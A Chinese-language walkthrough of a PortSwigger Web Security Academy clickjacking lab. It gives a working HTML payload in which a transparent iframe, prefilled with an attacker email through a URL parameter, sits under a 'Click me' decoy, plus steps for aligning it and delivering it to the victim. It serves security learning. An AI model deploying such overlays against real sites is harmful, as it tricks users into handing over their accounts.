靶场内容:
该实验室扩展了基本的点击劫持例如在实验室:基本点击劫持与CSRF令牌保护。
该实验室的目标是通过使用 URL 参数预填充表单并诱使用户无意中单击“更新电子邮件”按钮来更改用户的电子邮件地址。
为了解决这个实验,制作一些 HTML 来构建帐户页面,并通过单击“点击我”诱饵来欺骗用户更新他们的电子邮件地址。更改电子邮件地址后,实验室就解决了。
您可以使用以下凭据登录自己的帐户: wiener:peter
靶场分析
- 这个实验也很简单,目的是通过点击劫持诱导目标点击更新邮箱
- 而这个邮箱就是我们黑客的邮箱
<style>
iframe {
position:relative;
width:700;
height: 500;
opacity: 0.0001;
z-index: 2;
}
div {
position:absolute;
top:450;
left:80;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://acf81fac1e709c0d806f1378005800f7.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>- 这个实验的类型是通过点击劫持实现对URL的篡改导致的黑客攻击
- 上面代码的参数适用于14寸屏幕的Chrome,参数需要自己调配,差不多就行
- 将上面的html代码粘贴到服务器的body处
- 将 $url 替换为目标网站的用户帐户页面的 URL,其中包含“update email”表单。
- 为 iframe 的 $height_value 和 $width_value 变量替换合适的像素值(我们分别建议 700px 和 500px)。
- 为诱饵网页内容的 $top_value 和 $side_value 变量替换合适的像素值,以便“更新电子邮件”按钮和“测试我”诱饵动作对齐(我们建议分别为 450px 和 80px)。
- 设置不透明度值 $opacity 以确保目标 iframe 是透明的。最初,使用 0.1 的不透明度,以便您可以对齐 iframe 操作并根据需要调整位置值。对于提交的攻击,值 0.0001 将起作用。
- 单击“store”,然后单击“view exploit”。
- 将鼠标悬停在“Test me”上并确保光标变为手形,表明 div 元素已正确定位。如果没有,则通过修改样式表的 top 和 left 属性来调整 div 元素的位置。
- 正确排列 div 元素后,将“Test me”更改为“Click me”,然后单击“Store”。
- 现在点击“deliver exploit to victim”,实验室应该就解决了。
